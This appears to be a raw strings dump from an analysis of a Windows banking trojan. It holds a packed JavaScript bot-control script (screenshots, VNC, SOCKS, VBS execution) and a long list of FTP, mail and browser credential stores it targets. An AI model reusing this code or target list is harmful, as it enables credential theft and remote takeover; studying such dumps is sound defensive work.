i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

%s.Key = '%s';

%s.Key = '%s';

%s.Hide('%0.8X%0.8X');

%s.Hide('%0.8X%0.8X');

CertificateAuthority

CertificateAuthority

%s.pfx

%s.pfx

cookies.sqlite

cookies.sqlite

cookies.sqlite-journal

cookies.sqlite-journal

ff/%u/cookies.sqlite

ff/%u/cookies.sqlite

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

[%s - X32 EQ PID: %u TID: %u]

[%s - X32 EQ PID: %u TID: %u]

X-Firefox-Spdy

X-Firefox-Spdy

X-WebKit-CSP

X-WebKit-CSP

hXXps://

hXXps://

HTTP/1.1 200 OK

HTTP/1.1 200 OK

Content-Length: %u

Content-Length: %u

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.0

GET /favicon.ico HTTP/1.0

login=%s&pass=%s

login=%s&pass=%s

chrome.dll

chrome.dll

127.0.0.1

127.0.0.1

DrWeb

DrWeb

McAfee.com

McAfee.com

Doctor Web

Doctor Web

Common Files\Doctor Web

Common Files\Doctor Web

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\Run

regsvr32.exe "%s"

regsvr32.exe "%s"

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

[VNC] Parse param error: %s

[VNC] Parse param error: %s

\regsvr32.exe

\regsvr32.exe

[VNC] Fail create process: %u

[VNC] Fail create process: %u

[VNC] Fail inject to process: %u

[VNC] Fail inject to process: %u

fv_%u.avi

fv_%u.avi

#FV_%u

#FV_%u

#FV_%s

#FV_%s

pass.txt

pass.txt

cert.pfx

cert.pfx

PFXImportCertStore

PFXImportCertStore

Crypt32.dll

Crypt32.dll

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3-1", false);

user_pref("network.http.spdy.enabled.v3-1", false);

prefs.js

prefs.js

csrss.exe

csrss.exe

smss.exe

smss.exe

wininit.exe

wininit.exe

services.exe

services.exe

svchost.exe

svchost.exe

lsas.exe

lsas.exe

lsm.exe

lsm.exe

winlogon.exe

winlogon.exe

taskhost.exe

taskhost.exe

HttpEndRequestA

HttpEndRequestA

HttpEndRequestW

HttpEndRequestW

ADVAPI32.DLL

ADVAPI32.DLL

Init in Browser = %u

Init in Browser = %u

Init in Shell = %u

Init in Shell = %u

[Socks] Failt connect BC [%s:%u]

[Socks] Failt connect BC [%s:%u]

[Socks] Fail parse param: %s

[Socks] Fail parse param: %s

Shell Update Exists %s = %s

Shell Update Exists %s = %s

Shell Reload status = %u = %u

Shell Reload status = %u = %u

#cert

#cert

Del Old = %s

Del Old = %s

Del Reg = %s

Del Reg = %s

Fail Save New = %u

Fail Save New = %u

Reg Autorun = %u = %u = %ws = %ws

Reg Autorun = %u = %u = %ws = %ws

Updated fail size %u != %u

Updated fail size %u != %u

Updated RSA Init fail = %u

Updated RSA Init fail = %u

Sign Bad = %u

Sign Bad = %u

Save New File = %u = %u

Save New File = %u = %u

Update_InstallNew = %u = %u

Update_InstallNew = %u = %u

[Pony] Fail Get Pass

[Pony] Fail Get Pass

Start Update: %s = %u

Start Update: %s = %u

download status = %u =%u

download status = %u =%u

Updated status = %u

Updated status = %u

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status[Local]: %u = %u

DL_EXEC Status[Local]: %u = %u

Start Socks addr: %s

Start Socks addr: %s

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Local]: %u

Start Socks Status[Local]: %u

Start VNC addr: %s

Start VNC addr: %s

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Local]: %u

Start VNC Status[Local]: %u

msvcrt.dll

msvcrt.dll

%0.8X%0.8X%c

%0.8X%0.8X%c

firefox.exe

firefox.exe

explorer.exe

explorer.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

%Program Files%\Mozilla Firefox\

%Program Files%\Mozilla Firefox\

mozsqlite3.dll

mozsqlite3.dll

sqlite3_open

sqlite3_open

sqlite3_exec

sqlite3_exec

sqlite3_close

sqlite3_close

sqlite3_free

sqlite3_free

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

hXXp://

hXXp://

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

\\.\pipe\

\\.\pipe\

PID: %u [%0.2u:%0.2u:%0.2u]

PID: %u [%0.2u:%0.2u:%0.2u]

[BC] Cmd Ver Error

[BC] Cmd Ver Error

[BC] Wait Ping error %u[%u]

[BC] Wait Ping error %u[%u]

[BC] Fail Connect: %u

[BC] Fail Connect: %u

[BC] Fail read cmd

[BC] Fail read cmd

[BC] Cmd need reauth

[BC] Cmd need reauth

[BC] cmd error: %u

[BC] cmd error: %u

[BC] Cmd need disconnect

[BC] Cmd need disconnect

ntdll.dll

ntdll.dll

gdiplus.dll

gdiplus.dll

GdiplusShutdown

GdiplusShutdown

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

account.cfg

account.cfg

account.cfn

account.cfn

Dir #%u

Dir #%u

.oeaccount

.oeaccount

Software\Microsoft\Windows Live Mail

Software\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

Software\Microsoft\Windows Mail

Software\Microsoft\Windows Mail

\Microsoft\Windows Mail

\Microsoft\Windows Mail

PopPort

PopPort

PopPassword

PopPassword

SmtpServer

SmtpServer

SmtpPort

SmtpPort

SmtpAccount

SmtpAccount

SmtpPassword

SmtpPassword

abe2869f-9b47-4cd9-a358-c22904dba7f7

abe2869f-9b47-4cd9-a358-c22904dba7f7

MS IE FTP Passwords

MS IE FTP Passwords

RushSite.xml

RushSite.xml

\FTPRush

\FTPRush

bitkinex.ds

bitkinex.ds

NDSites.ini

NDSites.ini

Software\LeechFTP

Software\LeechFTP

bookmark.dat

bookmark.dat

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

sites.db

sites.db

servers.xml

servers.xml

\FTPGetter

\FTPGetter

ESTdb2.dat

ESTdb2.dat

\Estsoft\ALFTP

\Estsoft\ALFTP

QData.dat

QData.dat

SM.arch

SM.arch

FTP .Link\shell\open\command

FTP .Link\shell\open\command

NppFTP.xml

NppFTP.xml

Software\MAS-Soft\FTPInfo\Setup

Software\MAS-Soft\FTPInfo\Setup

ServerList.xml

ServerList.xml

\FTPInfo

\FTPInfo

NovaFTP.db

NovaFTP.db

\INSoftware\NovaFTP

\INSoftware\NovaFTP

\sites.xml

\sites.xml

ftplast.osd

ftplast.osd

\SharedSettings.ccs

\SharedSettings.ccs

\SharedSettings.sqlite

\SharedSettings.sqlite

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.sqlite

\SharedSettings_1_0_5.sqlite

\32BitFtp.ini

\32BitFtp.ini

FTPCON

FTPCON

FTP CONTROL

FTP CONTROL

FTPVoyager.ftp

FTPVoyager.ftp

\RhinoSoft.com

\RhinoSoft.com

FTPVoyager.qc

FTPVoyager.qc

FTPVoyager.Archive

FTPVoyager.Archive

SiteInfo.QFP

SiteInfo.QFP

WinFTP

WinFTP

DeluxeFTP

DeluxeFTP

sites.xml

sites.xml

Staff-FTP

Staff-FTP

sites.ini

sites.ini

FreshFTP

FreshFTP

Software\FlashPeak\BlazeFtp\Settings

Software\FlashPeak\BlazeFtp\Settings

LastPassword

LastPassword

LastPort

LastPort

BlazeFtp

BlazeFtp

site.dat

site.dat

\BlazeFtp

\BlazeFtp

GoFTP

GoFTP

Connections.txt

Connections.txt

3D-FTP

3D-FTP

\3D-FTP

\3D-FTP

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

EasyFTP

EasyFTP

FTPNow

FTPNow

FTP Now

FTP Now

FTPShell

FTPShell

ftpshell.fsi

ftpshell.fsi

ftpsite.ini

ftpsite.ini

FTPList.db

FTPList.db

My FTP

My FTP

project.ini

project.ini

Mailbox.ini

Mailbox.ini

FTP Navigator

FTP Navigator

FTP Commander

FTP Commander

ftplist.txt

ftplist.txt

Software\Sota\FFFTP

Software\Sota\FFFTP

Software\Sota\FFFTP\Options

Software\Sota\FFFTP\Options

Software\FTPWare\COREFTP\Sites

Software\FTPWare\COREFTP\Sites

FtpPort

FtpPort

Software\Cryer\WebSitePublisher

Software\Cryer\WebSitePublisher

_Password

_Password

Software\NCH Software\ClassicFTP\FTPAccounts

Software\NCH Software\ClassicFTP\FTPAccounts

FtpPassword

FtpPassword

_FtpPassword

_FtpPassword

FtpServer

FtpServer

FtpUserName

FtpUserName

FtpDirectory

FtpDirectory

Software\FTPClient\Sites

Software\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

PortNumber

PortNumber

PassWord

PassWord

Software\South River Technologies\WebDrive\Connections

Software\South River Technologies\WebDrive\Connections

Software\LinasFTP\Site Manager

Software\LinasFTP\Site Manager

FTP destination password

FTP destination password

FTP destination server

FTP destination server

FTP destination port

FTP destination port

FTP destination user

FTP destination user

FTP destination catalog

FTP destination catalog

FTP profiles

FTP profiles

Msi.dll

Msi.dll

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

\PocoSystem.ini

\PocoSystem.ini

accounts.ini

accounts.ini

sites.dat

sites.dat

\LeapWare\LeapFTP

\LeapWare\LeapFTP

unleap.exe

unleap.exe

leapftp

leapftp

FtpIniName

FtpIniName

Software\Ghisler\Windows Commander

Software\Ghisler\Windows Commander

wcx_PTF.ini

wcx_PTF.ini

Server.Pass

Server.Pass

Server.Host

Server.Host

Server.User

Server.User

Server.Port

Server.Port

Last Server Pass

Last Server Pass

Last Server Port

Last Server Port

\sitemanager.xml

\sitemanager.xml

\recentservers.xml

\recentservers.xml

\filezilla.xml

\filezilla.xml

"password" : "

"password" : "

"password":"

"password":"

\drives.js

\drives.js

\ExpanDrive\favorites.js

\ExpanDrive\favorites.js

\ExpanDrive\drives.js

\ExpanDrive\drives.js

wiseftpsrvs.ini

wiseftpsrvs.ini

wisePTF.ini

wisePTF.ini

wiseftpsrvs.bin

wiseftpsrvs.bin

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

FTP Count

FTP Count

FTP File%u

FTP File%u

Robo-FTP

Robo-FTP

SOFTWARE\%s\FTPServers

SOFTWARE\%s\FTPServers

user.config

user.config

.duck

.duck

SiteServer %u\Host

SiteServer %u\Host

SiteServer %u\WebUrl

SiteServer %u\WebUrl

SiteServer %u\Remote Directory

SiteServer %u\Remote Directory

SiteServer %u-User

SiteServer %u-User

SiteServer %u-User PW

SiteServer %u-User PW

SiteServer %u\SFTP

SiteServer %u\SFTP

Keychain

Keychain

Software\Nico Mak Computing\WinZip\FTP

Software\Nico Mak Computing\WinZip\FTP

Password

Password

Software\Far\Plugins\FTP\Hosts

Software\Far\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far\SavedDialogHistory\FTPHost

Software\Far\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

\win.ini

\win.ini

WS_FTP

WS_FTP

\Ipswitch\WS_FTP

\Ipswitch\WS_FTP

\GlobalSCAPE\CuteFTP

\GlobalSCAPE\CuteFTP

sm.dat

sm.dat

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Lite

\GlobalSCAPE\CuteFTP Lite

\CuteFTP

\CuteFTP

CUTEFTP

CUTEFTP

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

\Sites.dat

\Sites.dat

\Quick.dat

\Quick.dat

\History.dat

\History.dat

Software\BPFTP\Bullet Proof FTP\Main

Software\BPFTP\Bullet Proof FTP\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BPFTP\Bullet Proof FTP\Options

Software\BPFTP\Bullet Proof FTP\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BPFTP

Software\BPFTP

\SmartFTP

\SmartFTP

Favorites.dat

Favorites.dat

History.dat

History.dat

Software\TurboFTP

Software\TurboFTP

\TurboFTP

\TurboFTP

addrbk.dat

addrbk.dat

quick.dat

quick.dat

Port

Port

Login

Login

PasswordType

PasswordType

profiles.xml

profiles.xml

\FTP Explorer

\FTP Explorer

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\Profiles

Software\FTP Explorer\Profiles

FtpSite.xml

FtpSite.xml

PK11_GetInternalKeySlot

PK11_GetInternalKeySlot

sqlite3.dll

sqlite3.dll

sqlite3_prepare

sqlite3_prepare

sqlite3_step

sqlite3_step

sqlite3_column_bytes

sqlite3_column_bytes

sqlite3_column_blob

sqlite3_column_blob

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

PTF://

PTF://

signons.sqlite

signons.sqlite

\profiles.ini

\profiles.ini

PathToExe

PathToExe

\Mozilla\Firefox\

\Mozilla\Firefox\

Firefox

Firefox

Software\Mozilla

Software\Mozilla

fireFTPsites.dat

fireFTPsites.dat

\Mozilla\SeaMonkey\

\Mozilla\SeaMonkey\

SeaMonkey

SeaMonkey

\Mozilla\Profiles\

\Mozilla\Profiles\

Mozilla

Mozilla

password 51:b:

password 51:b:

SMTP Email Address

SMTP Email Address

SMTP Server

SMTP Server

SMTP User Name

SMTP User Name

HTTP User

HTTP User

HTTP Server URL

HTTP Server URL

HTTPMail User Name

HTTPMail User Name

HTTPMail Server

HTTPMail Server

SMTP User

SMTP User

POP3 Port

POP3 Port

SMTP Port

SMTP Port

IMAP Port

IMAP Port

POP3 Password2

POP3 Password2

IMAP Password2

IMAP Password2

NNTP Password2

NNTP Password2

HTTPMail Password2

HTTPMail Password2

SMTP Password2

SMTP Password2

POP3 Password

POP3 Password

IMAP Password

IMAP Password

NNTP Password

NNTP Password

HTTPMail Password

HTTPMail Password

SMTP Password

SMTP Password

{X-X-X-XX-XXXXXX}

{X-X-X-XX-XXXXXX}

inetcomm server passwords

inetcomm server passwords

outlook account manager passwords

outlook account manager passwords

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Pstorec.dll

Pstorec.dll

[VNC] EXEC: %s

[VNC] EXEC: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[VDESK] Read CMD %u[%u]

[VDESK] Read CMD %u[%u]

[VDESK] NOT AUTH CMD %u

[VDESK] NOT AUTH CMD %u

GetAsyncKeyState

GetAsyncKeyState

USER32.DLL

USER32.DLL

GetKeyboardState

GetKeyboardState

GetKeyState

GetKeyState

?WINMM.DLL

?WINMM.DLL

?DSOUND.DLL

?DSOUND.DLL

ZwConnectPort

ZwConnectPort

NTDLL.DLL

NTDLL.DLL

[VNC] PROCESS=%s

[VNC] PROCESS=%s

\explorer.exe

\explorer.exe

[VNC] SearchApp Status = %u

[VNC] SearchApp Status = %u

[VNC] FileName = %s

[VNC] FileName = %s

[VNC] CmdLine = %s

[VNC] CmdLine = %s

[VNC] W64 Redir OLD=%u

[VNC] W64 Redir OLD=%u

[VNC] CreateProcess Status = %u (%u)

[VNC] CreateProcess Status = %u (%u)

SysShadow

SysShadow

Chrome_WidgetWin_1

Chrome_WidgetWin_1

Chrome_WidgetWin_0

Chrome_WidgetWin_0

d3d10_1.dll

d3d10_1.dll

d3d10_1core.dll

d3d10_1core.dll

d3d10.dll

d3d10.dll

d3d10core.dll

d3d10core.dll

d2d1.dll

d2d1.dll

OPENGL32.dll

OPENGL32.dll

d3d9.dll

d3d9.dll

d3d11.dll

d3d11.dll

Dxtrans.dll

Dxtrans.dll

WinExec

WinExec

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

RegCloseKey

RegCloseKey

RegNotifyChangeKeyValue

RegNotifyChangeKeyValue

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

NETAPI32.dll

NETAPI32.dll

SHDeleteKeyA

SHDeleteKeyA

SHLWAPI.dll

SHLWAPI.dll

DeleteUrlCacheEntry

DeleteUrlCacheEntry

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

MSVCRT.dll

MSVCRT.dll

IPHLPAPI.DLL

IPHLPAPI.DLL

AVIFIL32.dll

AVIFIL32.dll

GetWindowsDirectoryW

GetWindowsDirectoryW

CallNamedPipeA

CallNamedPipeA

ConnectNamedPipe

ConnectNamedPipe

CreateNamedPipeW

CreateNamedPipeW

DisconnectNamedPipe

DisconnectNamedPipe

CreateNamedPipeA

CreateNamedPipeA

GetWindowsDirectoryA

GetWindowsDirectoryA

EnumWindows

EnumWindows

ActivateKeyboardLayout

ActivateKeyboardLayout

SetViewportOrgEx

SetViewportOrgEx

RegEnumKeyExA

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyA

RegCreateKeyExA

RegCreateKeyExA

RegOpenKeyExA

RegOpenKeyExA

CryptImportKey

CryptImportKey

CryptDestroyKey

CryptDestroyKey

RegOpenKeyA

RegOpenKeyA

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

CertOpenSystemStoreA

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertDeleteCertificateFromStore

CertAddCertificateContextToStore

CertAddCertificateContextToStore

CertCloseStore

CertCloseStore

CertEnumCertificatesInStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertDuplicateCertificateContext

PFXExportCertStoreEx

PFXExportCertStoreEx

CRYPT32.dll

CRYPT32.dll

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

FindCloseUrlCache

FindCloseUrlCache

FindNextUrlCacheEntryW

FindNextUrlCacheEntryW

FindFirstUrlCacheEntryW

FindFirstUrlCacheEntryW

COMDLG32.dll

COMDLG32.dll

WININET.DLL

WININET.DLL

{7BD47FDD-1028-4944-A268-024C76A61BA9}

{7BD47FDD-1028-4944-A268-024C76A61BA9}

{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

{4E153850-602D-4819-B83D-3CCD0A1E7351}

{4E153850-602D-4819-B83D-3CCD0A1E7351}

{1DB12055-380D-432E-9763-74AF5EF609C7}

{1DB12055-380D-432E-9763-74AF5EF609C7}

{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}

{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}

{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}

{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}

{11166F2F-6DE1-4205-8360-3AB2448931C2}

{11166F2F-6DE1-4205-8360-3AB2448931C2}

{7B4F16B2-1959-4C21-97FE-6A7768C974CF}

{7B4F16B2-1959-4C21-97FE-6A7768C974CF}

{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}

{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}

{77101F80-23B8-43A9-AE7B-5CC95982109D}

{77101F80-23B8-43A9-AE7B-5CC95982109D}

\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}

\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}

D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

{56E926DB-5D71-499E-8BBB-2E28568040CB}

{56E926DB-5D71-499E-8BBB-2E28568040CB}

U{4E153850-602D-4819-B83D-3CCD0A1E7351}

U{4E153850-602D-4819-B83D-3CCD0A1E7351}

2FFC7DAE-2BDA-4ABF-A443-1DD264C72327

2FFC7DAE-2BDA-4ABF-A443-1DD264C72327

=)=2===~=

=)=2===~=

3 343=3_3

3 343=3_3

= =,=`=}=

= =,=`=}=

echrome.dll

echrome.dll

iexplore.exe

iexplore.exe

chrome.exe

chrome.exe

\System32\KERNEL32.DLL

\System32\KERNEL32.DLL

\System32\kernelbase.dll

\System32\kernelbase.dll

\ThemeApiPort

\ThemeApiPort

%System%\spoolsv.exe

%System%\spoolsv.exe

jqs.exe_1592_rwx_010B0000_00054000:

%Documents and Settings%\All Users\Application Data\VoddAlaj\VoddAlaj.dat

%Documents and Settings%\All Users\Application Data\VoddAlaj\VoddAlaj.dat

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

HHt.HHt

HHt.HHt

More information: hXXp://VVV.ibsensoftware.com/

More information: hXXp://VVV.ibsensoftware.com/

8HttpAddRequestHeadersA

8HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestA

HttpOpenRequestW

HttpOpenRequestW

HttpQueryInfoA

HttpQueryInfoA

HttpSendRequestA

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestExW

HttpSendRequestW

HttpSendRequestW

wininet.dll

wininet.dll

rapport

rapport

ieframe.dll

ieframe.dll

NSPR4.DLL

NSPR4.DLL

nss3.dll

nss3.dll

KERNEL32.DLL

KERNEL32.DLL

\Google\Chrome\User Data\Default\

\Google\Chrome\User Data\Default\

\Mozilla\Firefox\Profiles\

\Mozilla\Firefox\Profiles\

sol_chrome/

sol_chrome/

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

.rdata

.rdata

@http

@http

SELECT url FROM moz_places

SELECT url FROM moz_places

places.sqlite
